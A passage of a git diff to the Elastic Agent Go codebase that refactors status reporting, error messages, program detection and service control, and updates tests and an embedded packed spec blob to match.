if code == status.Failed { + return proto.Status_FAILED + } + return proto.Status_HEALTHY +} + +func agentAppStatusToProto(apps []status.AgentApplicationStatus) []*proto.ApplicationStatus { + s := make([]*proto.ApplicationStatus, len(apps)) + for i, a := range apps { + s[i] = &proto.ApplicationStatus{ + Id: a.ID, + Name: a.Name, + Status: proto.Status(a.Status.ToProto()), + Message: a.Message, + Payload: "", + } + } + return s +} diff --git a/x-pack/elastic-agent/pkg/agent/errors/error.go b/x-pack/elastic-agent/pkg/agent/errors/error.go index 7ce5c7703490..00c139c93c8e 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/error.go +++ b/x-pack/elastic-agent/pkg/agent/errors/error.go @@ -54,6 +54,12 @@ func (e agentError) Unwrap() error { // Error returns a string consisting of a message and originating error. func (e agentError) Error() string { + if e.err == nil { + if e.msg != "" { + return e.msg + } + return "unknown error" + } if e.msg != "" { return errors.Wrap(e.err, e.msg).Error() } diff --git a/x-pack/elastic-agent/pkg/agent/errors/error_test.go b/x-pack/elastic-agent/pkg/agent/errors/error_test.go index faee302b8a04..161120daf4be 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/error_test.go +++ b/x-pack/elastic-agent/pkg/agent/errors/error_test.go @@ -7,7 +7,6 @@ package errors import ( "fmt" "io" - "strings" "testing" "github.com/pkg/errors" @@ -146,48 +145,6 @@ func TestErrors(t *testing.T) { } } -func TestNoErrorNoMsg(t *testing.T) { - actualErr := New() - agentErr, ok := actualErr.(Error) - if !ok { - t.Error("expected Error") - return - } - - e := agentErr.Error() - if !strings.Contains(e, "error_test.go[") { - t.Errorf("Error does not contain source file: %v", e) - } - - if !strings.HasSuffix(e, ": unknown error") { - t.Errorf("Error does not contain default error: %v", e) - } -} - -func TestNoError(t *testing.T) { - // test with message - msg := "msg2" - actualErr := New(msg) - agentErr, ok := actualErr.(Error) - if !ok { - t.Error("expected Error") - return - } - - e := agentErr.Error() - if !strings.Contains(e, "error_test.go[") { - t.Errorf("Error does not contain source file: %v", e) - } - - if !strings.HasSuffix(e, ": unknown error") { - t.Errorf("Error does not contain default error: %v", e) - } - - if !strings.HasPrefix(e, msg) { - t.Errorf("Error does not contain provided message: %v", e) - } -} - func TestMetaFold(t *testing.T) { err1 := fmt.Errorf("level1") err2 := New("level2", err1, M("key1", "level2"), M("key2", "level2")) diff --git a/x-pack/elastic-agent/pkg/agent/errors/generators.go b/x-pack/elastic-agent/pkg/agent/errors/generators.go index 26a067f4ce86..ce9e1961d3b9 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/generators.go +++ b/x-pack/elastic-agent/pkg/agent/errors/generators.go @@ -4,13 +4,6 @@ package errors -import ( - "fmt" - "runtime" - - "github.com/pkg/errors" -) - // M creates a meta entry for an error func M(key string, val interface{}) MetaRecord { return MetaRecord{key: key, @@ -43,13 +36,5 @@ func New(args ...interface{}) error { } } - if agentErr.err == nil { - agentErr.err = errors.New("unknown error") - - if _, file, line, ok := runtime.Caller(1); ok { - agentErr.err = errors.Wrapf(agentErr.err, fmt.Sprintf("%s[%d]", file, line)) - } - } - return agentErr } diff --git a/x-pack/elastic-agent/pkg/agent/install/install.go b/x-pack/elastic-agent/pkg/agent/install/install.go index 01b9bd6f6166..3e7df33ccd7f 100644 --- a/x-pack/elastic-agent/pkg/agent/install/install.go +++ b/x-pack/elastic-agent/pkg/agent/install/install.go @@ -104,6 +104,22 @@ func StartService() error { return nil } +// StopService stops the installed service. +func StopService() error { + svc, err := newService() + if err != nil { + return err + } + err = svc.Stop() + if err != nil { + return errors.New( + err, + fmt.Sprintf("failed to stop service (%s)", ServiceName), + errors.M("service", ServiceName)) + } + return nil +} + // findDirectory returns the directory to copy into the installation location. // // This also verifies that the discovered directory is a valid directory for installation. diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator.go b/x-pack/elastic-agent/pkg/agent/operation/operator.go index 49df45071ced..a95bfe5b165d 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator.go @@ -103,7 +103,7 @@ func NewOperator( reporter: reporter, monitor: monitor, statusController: statusController, - statusReporter: statusController.Register("operator-" + pipelineID), + statusReporter: statusController.RegisterComponent("operator-" + pipelineID), } operator.initHandlerMap() @@ -142,7 +142,7 @@ func (o *Operator) Close() error { func (o *Operator) HandleConfig(cfg configrequest.Request) error { _, stateID, steps, ack, err := o.stateResolver.Resolve(cfg) if err != nil { - o.statusReporter.Update(status.Failed) + o.statusReporter.Update(state.Failed, err.Error()) return errors.New(err, errors.TypeConfig, fmt.Sprintf("operator: failed to resolve configuration %s, error: %v", cfg, err)) } o.statusController.UpdateStateID(stateID) @@ -151,8 +151,9 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { if strings.ToLower(step.ProgramSpec.Cmd) != strings.ToLower(monitoringName) { if _, isSupported := program.SupportedMap[strings.ToLower(step.ProgramSpec.Cmd)]; !isSupported { // mark failed, new config cannot be run - o.statusReporter.Update(status.Failed) - return errors.New(fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd), + msg := fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd) + o.statusReporter.Update(state.Failed, msg) + return errors.New(msg, errors.TypeApplication, errors.M(errors.MetaKeyAppName, step.ProgramSpec.Cmd)) } @@ -160,18 +161,20 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { handler, found := o.handlers[step.ID] if !found { - o.statusReporter.Update(status.Failed) - return errors.New(fmt.Sprintf("operator: received unexpected event '%s'", step.ID), errors.TypeConfig) + msg := fmt.Sprintf("operator: received unexpected event '%s'", step.ID) + o.statusReporter.Update(state.Failed, msg) + return errors.New(msg, errors.TypeConfig) } if err := handler(step); err != nil { - o.statusReporter.Update(status.Failed) - return errors.New(err, errors.TypeConfig, fmt.Sprintf("operator: failed to execute step %s, error: %v", step.ID, err)) + msg := fmt.Sprintf("operator: failed to execute step %s, error: %v", step.ID, err) + o.statusReporter.Update(state.Failed, msg) + return errors.New(err, errors.TypeConfig, msg) } } // Ack the resolver should state for next call. - o.statusReporter.Update(status.Healthy) + o.statusReporter.Update(state.Healthy, "") ack() return nil diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator_test.go b/x-pack/elastic-agent/pkg/agent/operation/operator_test.go index a7a3547fa88a..8966ca9a516b 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator_test.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator_test.go @@ -79,7 +79,7 @@ func TestConfigurableRun(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -112,7 +112,7 @@ func TestConfigurableRun(t *testing.T) { items := operator.State() item0, ok := items[p.ID()] - if !ok || item0.Status != state.Running { + if !ok || item0.Status != state.Healthy { t.Fatalf("Process no longer running after config %#v", items) } pid := item0.ProcessInfo.PID @@ -154,7 +154,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } pid = item.ProcessInfo.PID @@ -194,7 +194,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status == state.Running { + if item.Status == state.Healthy { return fmt.Errorf("process never left running") } return nil @@ -229,7 +229,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to back to running") } return nil @@ -263,7 +263,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } pid = item.ProcessInfo.PID @@ -294,7 +294,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status == state.Running { + if item.Status == state.Healthy { return fmt.Errorf("process never left running") } return nil @@ -330,7 +330,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to back to running") } return nil @@ -366,7 +366,7 @@ func TestConfigurableStartStop(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -415,7 +415,7 @@ func TestConfigurableService(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -448,7 +448,7 @@ func TestConfigurableService(t *testing.T) { items := operator.State() item0, ok := items[p.ID()] - if !ok || item0.Status != state.Running { + if !ok || item0.Status != state.Healthy { t.Fatalf("Process no longer running after config %#v", items) } diff --git a/x-pack/elastic-agent/pkg/agent/program/program.go b/x-pack/elastic-agent/pkg/agent/program/program.go index 87d46bf07a04..7917e1f10533 100644 --- a/x-pack/elastic-agent/pkg/agent/program/program.go +++ b/x-pack/elastic-agent/pkg/agent/program/program.go @@ -55,7 +55,7 @@ func Programs(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) (map groupedPrograms := make(map[string][]Program) for k, config := range grouped { - programs, err := detectPrograms(agentInfo, config) + programs, err := DetectPrograms(agentInfo, config) if err != nil { return nil, errors.New(err, errors.TypeConfig, "fail to generate program configuration") } @@ -65,48 +65,18 @@ func Programs(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) (map return groupedPrograms, nil } -func detectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) ([]Program, error) { +// DetectPrograms returns the list of programs detected from the provided configuration. +func DetectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) ([]Program, error) { programs := make([]Program, 0) for _, spec := range Supported { specificAST := singleConfig.Clone() - if len(spec.Constraints) > 0 { - constraints, err := eql.New(spec.Constraints) - if err != nil { - return nil, err - } - ok, err := constraints.Eval(specificAST) - if err != nil { - return nil, err - } - - if !ok { - continue - } - } - - err := spec.Rules.Apply(agentInfo, specificAST) - if err != nil { - return nil, err - } - - if len(spec.When) == 0 { - return nil, ErrMissingWhen - } - - expression, err := eql.New(spec.When) + ok, err := DetectProgram(spec, agentInfo, specificAST) if err != nil { return nil, err } - - ok, err := expression.Eval(specificAST) - if err != nil { - return nil, err - } - if !ok { continue } - program := Program{ Spec: spec, Config: specificAST, @@ -114,7 +84,42 @@ func detectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST programs = append(programs, program) } return programs, nil +} + +// DetectProgram returns true or false if this program exists in the AST. +// +// Note `ast` is modified to match what the program expects. Should clone the AST before passing to +// this function if you want to still have the original. +func DetectProgram(spec Spec, info transpiler.AgentInfo, ast *transpiler.AST) (bool, error) { + if len(spec.Constraints) > 0 { + constraints, err := eql.New(spec.Constraints) + if err != nil { + return false, err + } + ok, err := constraints.Eval(ast) + if err != nil { + return false, err + } + if !ok { + return false, nil + } + } + + err := spec.Rules.Apply(info, ast) + if err != nil { + return false, err + } + + if len(spec.When) == 0 { + return false, ErrMissingWhen + } + + expression, err := eql.New(spec.When) + if err != nil { + return false, err + } + return expression.Eval(ast) } // KnownProgramNames returns a list of runnable programs by the elastic-agent. diff --git a/x-pack/elastic-agent/pkg/agent/program/supported.go b/x-pack/elastic-agent/pkg/agent/program/supported.go index 0e6b7d7d0288..85522517c164 100644 --- a/x-pack/elastic-agent/pkg/agent/program/supported.go +++ b/x-pack/elastic-agent/pkg/agent/program/supported.go @@ -24,7 +24,7 @@ func init() { // spec/heartbeat.yml // spec/metricbeat.yml // spec/packetbeat.yml - unpacked := packer.MustUnpack("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") + unpacked := packer.MustUnpack("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") SupportedMap = make(map[string]Spec) for f, v := range unpacked { diff --git a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go index 81f03c3b0094..2694ed1cd3fe 100644 --- a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go +++ b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go @@ -54,7 +54,7 @@ func TestCmdBinaryOnlyYAML(t *testing.T) { } func TestCmdDaemon(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) require.NoError(t, srv.Start()) defer srv.Stop() @@ -70,7 +70,7 @@ func TestCmdDaemon(t *testing.T) { } func TestCmdDaemonYAML(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) require.NoError(t, srv.Start()) defer 